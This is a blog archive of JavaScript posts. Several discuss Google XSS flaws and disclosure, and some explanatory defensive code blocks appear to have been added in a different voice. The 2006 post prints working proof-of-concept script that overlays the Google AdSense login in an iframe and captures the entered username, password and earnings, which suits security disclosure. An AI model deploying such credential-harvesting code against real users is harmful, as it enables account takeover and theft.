Jibbering Musings » Javascript

Archive for the 'Javascript' Category

Exporting GPX from Strava

Monday, September 5th, 2011

I knocked up a Greasemonkey script to get GPX routes out of Strava, to help you know exactly where the segments start and finish. The script lets you export GPX for rides and segments from Strava. At the moment it’s very rudimentary, with just the route being created. It would be quite easy to add way markers or course points to it to highlight when you were approaching the start or finish of a segment, but for now I just kept it super simple.
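As an added illustration of the output the post describes (this is not the Greasemonkey script itself), the following Node.js snippet turns a route plus its segment boundaries into a GPX 1.1 document, with the segment start and finish written as waypoints. The track points, the segment, and the `lat`/`lon`/`ele`/`startIndex`/`endIndex` field names are all constructed for this example; the XML escaping is there because names copied from a third-party site must never be pasted raw into markup.

```javascript
// Added example, not the Greasemonkey script from the post: build a GPX track
// from a route and mark where each segment starts and finishes with waypoints.
// Runs under Node.js; all sample data and field names are constructed.

// Names come from an external site, so escape anything XML could misread.
function escapeXml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// One <trkpt> per route point; elevation is optional in GPX.
function trkpt(p) {
  const ele = p.ele === undefined ? '' : `<ele>${p.ele}</ele>`;
  return `<trkpt lat="${p.lat}" lon="${p.lon}">${ele}</trkpt>`;
}

// Each segment yields two waypoints, taken from the route by index.
function segmentWaypoints(route, segments) {
  return segments.flatMap((s) => [
    { ...route[s.startIndex], name: `${s.name} start` },
    { ...route[s.endIndex], name: `${s.name} finish` },
  ]);
}

function wpt(w) {
  return `<wpt lat="${w.lat}" lon="${w.lon}"><name>${escapeXml(w.name)}</name></wpt>`;
}

// GPX 1.1 orders waypoints before tracks, so emit them first.
function toGpx(rideName, route, segments) {
  const wpts = segmentWaypoints(route, segments).map(wpt).join('\n  ');
  const pts = route.map(trkpt).join('\n      ');
  return [
    '<?xml version="1.0" encoding="UTF-8"?>',
    '<gpx version="1.1" creator="added-example" xmlns="http://www.topografix.com/GPX/1/1">',
    `  ${wpts}`,
    `  <trk><name>${escapeXml(rideName)}</name>`,
    '    <trkseg>',
    `      ${pts}`,
    '    </trkseg>',
    '  </trk>',
    '</gpx>',
  ].join('\n');
}

// Constructed sample: four points and one segment covering points 1..2,
// with a deliberately awkward name to exercise the escaping.
const SAMPLE_ROUTE = [
  { lat: 51.4545, lon: -2.5879, ele: 10 },
  { lat: 51.4550, lon: -2.5870, ele: 12 },
  { lat: 51.4560, lon: -2.5860, ele: 15 },
  { lat: 51.4570, lon: -2.5850, ele: 14 },
];
const SAMPLE_SEGMENTS = [{ name: 'Hill <climb> & sprint', startIndex: 1, endIndex: 2 }];

function sampleGpx() {
  return toGpx('Sample ride', SAMPLE_ROUTE, SAMPLE_SEGMENTS);
}

console.log(sampleGpx());
```

Feeding a real Strava route in is just a matter of filling `SAMPLE_ROUTE` with the site's coordinates; everything else stays the same.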

Don’t serve JSON as text/html

Wednesday, July 5th, 2006

Another day, another XSS flaw, this one in Google again, but it is a little more interesting than the usual ones: what it shows is how JSON results add an extra attack vector that your QA team might miss.

The problem here was that the JSON was returned with a MIME type of text/html; a browser will render that as if it were an HTML page, even if it’s really just a javascript snippet. The easiest way to protect against these is to ensure that all javascript received by the XMLHttpRequest object is returned with a suitable MIME type, application/json. That way, even when you make a mistake and write unencoded untrusted data to the document, it won’t allow people to attack your site.
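An added example (not code from the post) of the response-side fix just described, written for Node.js: a JSON body served as text/html next to the same body served with an explicit JSON media type, plus the `X-Content-Type-Options: nosniff` header that stops browsers second-guessing the type. The response object shape, the helper names and the sample query are constructed for this example; `JSON.stringify`, `JSON.parse` and the header names are standard.

```javascript
// Added example (not from the original post): return JSON with a content type
// the browser will never render as HTML, and compare it with the text/html
// mistake the post describes. Node.js; helpers and sample data are constructed.

// Characters that are harmless inside a JSON string but dangerous if the body
// is ever interpreted as HTML or inlined into a <script> block.
const HTML_UNSAFE = {
  '<': '\\u003c',
  '>': '\\u003e',
  '&': '\\u0026',
  '\u2028': '\\u2028',
  '\u2029': '\\u2029',
};

// JSON.stringify escapes quotes and control characters but leaves < > & as-is.
// Swapping them for \uXXXX escapes keeps the JSON valid while removing anything
// an HTML parser could act on.
function toHtmlSafeJson(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (c) => HTML_UNSAFE[c]);
}

// The mistake the post describes: a JSON body, but a content type that tells
// the browser to treat it as a document.
function jsonAsTextHtml(value) {
  return {
    status: 200,
    headers: { 'Content-Type': 'text/html' },
    body: JSON.stringify(value),
  };
}

// The fix: an explicit JSON media type, nosniff so the type cannot be
// overridden by content sniffing, and HTML-unsafe characters escaped.
function jsonResponse(value) {
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/json; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: toHtmlSafeJson(value),
  };
}

// Rough model of what a browser does when the response is opened directly:
// text/html is parsed as a document, application/json is shown as text.
function wouldRenderAsHtml(response) {
  const type = (response.headers['Content-Type'] || '').split(';')[0].trim().toLowerCase();
  return type === 'text/html';
}

// Constructed sample: a search echo containing an unencoded, attacker-controlled query.
const untrustedQuery = '<script>alert(document.cookie)</script>';
const payload = { query: untrustedQuery, results: [] };

// The hardened body must still parse back to the same data on the client.
function roundTrips(value) {
  return JSON.parse(jsonResponse(value).body).query === value.query;
}

console.log('text/html renders as HTML:', wouldRenderAsHtml(jsonAsTextHtml(payload)));
console.log('application/json renders as HTML:', wouldRenderAsHtml(jsonResponse(payload)));
console.log('hardened body:', jsonResponse(payload).body);
```

The escaping step is belt and braces: the content type is what actually stops rendering, but escaping `<`, `>` and `&` means the same body is also safe if it is ever pasted into a page by a different code path.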

The Google exploit was reported here; at the time of writing it is unpatched. Unfortunately that was down to the discoverer not giving Google any time to fix it: whilst they have had their problems before, recently they have patched quickly, so this was not very fair, or wise. Google also appear to be taking testing their own services for security flaws more seriously; they recently had a presentation to the QA team that you can watch on Google Video.

As I’ve said before, having everything on a single domain causes problems: it means any exploit anywhere on the domain allows you to exploit any service provided on that domain. This exploit is also present on https:// Google, which reinforces the problem XSS can present to a user, and why XSS is not simply about cookie stealing. Here’s a simple demonstration of using the exploit to steal a username and password from Google AdSense.

The exploit is simply used to create an IFRAME that fills the document and points it at the Google AdSense login; when the user logs in, the username and password are alerted, and after logging in, “today’s earnings” are alerted too. Of course a real attacker would not alert these fields, but would send them off to a site to be collected later. Are Google AdSense passwords useful? Would you notice if the address or account the cash goes to had changed until you didn’t get the cheque?

The script code is simple; you don’t need to be clever, and phishers generally aren’t stupid: it takes brains to launder money.

document.body.innerHTML="<div><iframe src='https://www.google.com/adsense/report/overview'"+
" onload='go()' style='position:absolute;top:0;left:0;height:100%;width:100%;'></iframe></div>";

function go() {
 try {
  // First load: the login form is showing, so hook its submit handler.
  var win=window.frames[0];
  win.document.body.style.overflow="hidden";
  win.document.body.style.border="0px solid white";
  var doc=win.frames[0].document.forms[0];
  doc.onsubmit=function() {
   alert("Your adsense username and password are:\n"+
    doc["Email"].value+'\nand\n'+doc["Passwd"].value);
   x=window.open(location.href);
  }
 } catch (e) {
  // Second load (after login): no form any more, so read the earnings figure instead.
  try {
   var win=window.frames[0];
   var doc=win.document.body;
   var x=doc.getElementsByTagName('h1')[0];
   alert("Today's Earnings:"+x.getElementsByTagName('span')[0].innerHTML.replace(" ",""));
  } catch (e) {}
 }
}

The result is clear:

From Shiny to Orange…

Friday, August 5th, 2005

Fresh from my shiny experiences, I’ve now joined the Orange people. T-Mobile, who I’d happily used for years, finally sent me too many spam text messages, so I had to leave. I chose Orange thanks to some lobbying from a friend who wanted to go to the cinema (Orange Wednesday gives customers 2 for 1 cinema tickets for a 10p SMS charge), and someone else recommended the deal available.

It’s a good deal, and now as well as my Nokia 1100 I have a Nokia 6680. It’s a videophone, so I made my first video call, and completely pointless it was too: I had to get dressed to make it, I had to look at the screen rather than wander around the room, and the quality wasn’t good enough if someone was trying to show me something actually interesting. It’s unlikely I’ll ever make another video call…

The most annoying thing about the 6680 though is that it interferes with the audio on the TV when it’s being used. It’s a cheap TV, but GSM phones don’t cause it any problems, and the 6680 in GSM mode doesn’t cause it a problem either. I think other than when I’m using data, I may well keep the 6680 in GSM-only mode: the battery life is miles better, and it doesn’t interfere with anything. I certainly wouldn’t recommend 3G for anyone else; stick with the cheaper GSM phones: smaller, neater, better battery life, and more reliable. The 6680 also comes with no games, not even Snake. This has depressed me about Nokia; it looks like they’re pandering to the networks to encourage more people to buy downloaded games. They should remember who their real customers are.

Opera 8.0 and wireless IRC have been installed and are working nicely though. The Symbian Opera 8.0’s javascript support looks really good, and the XMLHttpRequest object works nicely, with all the examples, including the newly added one, working well.

Wot no body { background-color:white; } ?

Sunday, July 24th, 2005

Yesterday I had a good day at OpenTech, which was good fun, and I met lots of interesting folk, but I missed an opportunity to ask a Yahoo Search bod, Jeremy Zawodny, why their search site didn’t bother setting a background colour. So instead, I’m going to start what’s hopefully not a regular look at sites which fail…

All of the major brands on the web other than Amazon failed to do the most basic QA on their sites, and all of them suffer from developers who don’t really know the common pitfalls of designing. I don’t know why this is, but please sort it out; it really looks bad for your brand. Go back to your style guides and read the bit where it says white backgrounds…

The RTW Ticket Route Planner again

Sunday, June 19th, 2005

As I didn’t bother linking to the route planner last time, I thought I’d mention it again. So here’s a link to my Round The World Route Planner.

Starting a new project

Saturday, June 11th, 2005

Scene: A typical office, two people Bob the project manager, and Jim the javascript muppet.

Bob: So Jim, we’ve got another project needing a thin client frontend to run on the desktops here, perfect for another of your HTML weblike frontends.
Jim: Oh cool, I’ve been wanting to try out XForms for that.
Bob: XForms? what are they then, I thought HTML, CSS and javascript was what you did?
Jim: Yeah but I’ve heard about these new things called XForms, apparently they make everything more semantic and easier to maintain.
Bob: You’ve heard? you realise we only have three weeks development in the schedule?
Jim: Oh I’m sure it’s simple, I met a guy in a pub who told me how easy it was, I’m sure I can pick it up.
Bob: Okay, if you’re sure the benefits are worth it, this will work with all our current desktops right?
Jim: Well we’ll need to roll out a new XForms client to all of them.
Bob: Ah, so which client do we use?
Jim: Well, there’s lots to choose from, I’ve heard there are more XForms clients when the standard came out than anything else, so it must be good?
Bob: So which is the best?
Jim: I dunno, give me a few days research time and I’m sure one will turn up.
Bob: So how much is that going to cost us?
Jim: I dunno, There doesn’t seem to be pricing info for most of the XForms players, still the beancounters aren’t doing much at the moment, they can find that out.
Bob: Hmm, but there’s plenty of examples of other people using these XForms in web solutions for us to learn from, right?
Jim: Not that I’ve found, but there’s a specification.
Bob: Okay… If you get hit by a bus, there’s plenty of other people out there we can hire with the skills to maintain it though?
Jim: Don’t think so, but I’m sure it’d be easy for them to learn it too.
Bob: So, let’s recap. Instead of using the tools we’ve used to successfully roll out tens of projects and people millions, you want us to pick a new technology you know nothing about, with immature implementations that we don’t know the cost of and will need to roll out to every desktop, and there are few examples to learn from. Then, even when you’ve written it, we won’t be able to easily hire someone to maintain it as the skills are rare, and you don’t think the risk to the project is too high?
Jim: Sure, it’ll be fine, I need to learn the technology sometime right?

Bob walks away and picks up the phone.
Bob: Harry, call up HR, we need a new javascript muppet, this one’s gone a bit crazy.


The disappearance of the background colour

Thursday, December 30th, 2004

A long time ago, the web’s background colour was a really quite ugly shade of grey, and all was good with the world, as everyone remembered to set the background colour to what they wanted. Now of course the default background colour is white, and no-one remembers. To remind me to always do it, and to make plain text and XML files easier to read in my browser, I set mine to a nice mellow yellow colour. This means I now see so many sites with weird colours, and not crappy little personal sites, but big corporate sites with big web budgets, but obviously no QA. Searching for “com” in Google should return some of the major sites on the web today, and what do we see? Yahoo without a background colour… Other sites I’ve noticed recently are Citibank, AOL and EasyJet.

I’m sure many of these sites spent thousands just on the meetings to pick their brand colours, and then they go and ruin it by not setting the background white? Quite apart from the risk of people having a background colour that doesn’t play nicely with the text colours they chose.

Google have finally fixed it.

Wednesday, October 20th, 2004

Google seem to have finally fixed the flaw sometime around 6am today. Not bad: it only took them a little over 2 years, so it’s good to know they’re responsive. Actually it seems from the logs that it made it into the Google bug tracking system around 4pm yesterday, so 14 hours from then to fully rolled out is actually quite impressive. What’s not impressive is the failure of the security@google.com address and the lack of any phone numbers to contact them.

Google did eventually get in contact with me by email at around 7PM yesterday, 3 hours after they knew about it and an hour after the Bugtraq posting. They didn’t seem to be overly concerned and claimed “to be aware of the issue”, which, combined with their lack of thanks for my drawing their attention to it, suggests that it was actually a known bug they’d just neglected to fix. They said they’d look into why my security@google.com emails failed to elicit a response, but seemed mostly concerned about getting me to take the exploit page down. I declined that request; it didn’t seem worthwhile, as the exploit had by then been mentioned on lots of other sites, so it would’ve done nothing to aid security.

The fix they put in place is still flawed: it relies on special-casing the vbscript, javascript and perlscript strings, meaning other language protocols are still at risk in IE with its multiple scripting language capability. The risk is obviously much lower, as very few people have other scripting handlers registered, but it could still be used as a vector to attack a corporate installation with other known script engines. What I don’t understand is why, instead of blacklisting various strings, they don’t just require it to start with http://. What other protocols do you want in an image on a customised Google?
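To make the blacklist-versus-allow-list point concrete, here is an added Node.js example (not the fix Google deployed, and not code from the post) that checks a user-supplied image URL both ways: first by rejecting only the three strings the post says were special-cased, then by parsing the URL and accepting only absolute http:// or https:// links. The sample URLs are constructed; `otherscript:` is a placeholder for any extra script engine an IE install might have registered, not a real scheme.

```javascript
// Added example (not the fix Google deployed): the string-blacklist approach
// the post criticises next to the allow-list the post suggests. Node.js; the
// sample URLs are constructed, and "otherscript:" is a hypothetical placeholder.

// Blacklist: reject only the three names the post says were special-cased.
const BLOCKED_WORDS = ['vbscript', 'javascript', 'perlscript'];

function imageUrlPassesBlacklist(url) {
  const lower = String(url).toLowerCase();
  return !BLOCKED_WORDS.some((w) => lower.includes(w));
}

// Allow-list: parse the URL and accept only absolute http:// or https:// links.
// Anything that fails to parse or uses another scheme is rejected, so a scheme
// the blacklist never heard of is rejected too.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

function imageUrlPassesAllowlist(url) {
  let parsed;
  try {
    parsed = new URL(String(url)); // throws on relative or malformed input
  } catch (e) {
    return false;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Constructed inputs: ordinary images, the two classic script schemes, a
// placeholder for an unlisted engine, and a data: URL.
const SAMPLE_URLS = [
  'http://example.com/logo.png',
  'https://example.com/logo.png',
  'javascript:alert(1)',
  'VBScript:MsgBox(1)',
  'otherscript:run()',          // hypothetical extra engine; not a real scheme
  'data:image/png;base64,AAAA',
];

function compare(urls) {
  return urls.map((u) => ({
    url: u,
    blacklist: imageUrlPassesBlacklist(u),
    allowlist: imageUrlPassesAllowlist(u),
  }));
}

// Inputs the blacklist lets through but the allow-list stops.
function blacklistMisses(urls) {
  return compare(urls).filter((r) => r.blacklist && !r.allowlist).map((r) => r.url);
}

console.table(compare(SAMPLE_URLS));
```

The allow-list also refuses relative paths, which is the trade-off of requiring an absolute http:// or https:// URL; for an image on a customised page that is usually acceptable, and it means every future scheme is rejected by default rather than needing another entry in a list.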

Hopefully Google will get in touch and explain what went wrong with the communication of the issue, and hopefully Google will realise that a phone number for the security team on the web would also help. (After trying to explain to Tesco customer support a few years back that there was a non-SSL credit card collection problem and getting absolutely nowhere, I’m not going to call normal people with security issues; they don’t understand them.) I don’t actually expect them to get back in touch though; they weren’t exactly friendly. Perhaps not surprising, as to them it seemed I went public before informing them, but for a trivial hole that’d been there for 2 years, I had to do something to get it fixed.

The talks that didn’t happen…

Monday, September 13th, 2004

I’m going to do a full write up of the conference some time soon, but while I remember, here’s a few of the talks I wanted to see but didn’t get a chance to, as the presenters couldn’t make it.

Up first, as I mentioned, was Locus (PDF report). Hopefully we can get the source code for it, as it’d be great to run this at SVG Open 2005, where the university is covered in wireless. More helpful here in Japan perhaps, where the lack of phones (for us visitors) made meeting people all the harder. We had IRC though.

Jonathon Phillips was meant to talk about the Open clipart library; I’d not really looked at the library before, but it’s great, a really high standard of artwork with lots that I can actually see using.

I’m sure there were lots I should’ve seen that did happen, but I spent my time in other rooms; I’ll write up the highlights of the ones I did see soon.

Voice over IP in the UK

Saturday, August 28th, 2004

I’ve recently been looking into a Voice over IP solution for cheap communication with some guys around the world, as well as providing a real phone number that can be published but routed easily and cheaply anywhere in the world.

Voice over IP seemed the obvious solution, so after a quick chat with some people and a good read of VOIP.org.uk, I started testing voiptalk.org. It costs nothing to get set up for just an IP phone, and you just buy some talk-time if you want to call real phone lines. I picked up a soft SIP phone from X-Ten and tried it out; here on my ADSL line everything worked great, calling out sounded good, and there were a few tweaks whilst I got the microphone balance right, but you always have to do that with mics.

I then spent 3 quid to get myself an incoming number, an 0870 number, so not cheap for people to call me, but at least they can. I could also get voicemail etc. delivered by email, and outgoing calls are cheap all over the world. Getting a geographic number would be good, but that seems to cost 90 quid a year, so it’s really only useful if you wanted a presence in a particular UK region. Still, it might be a good idea to get a London number; I’m looking for a job at the moment, and people always seem put off by my west-country address, even though it’s really just because that’s the only place I’ve got for a postal address.
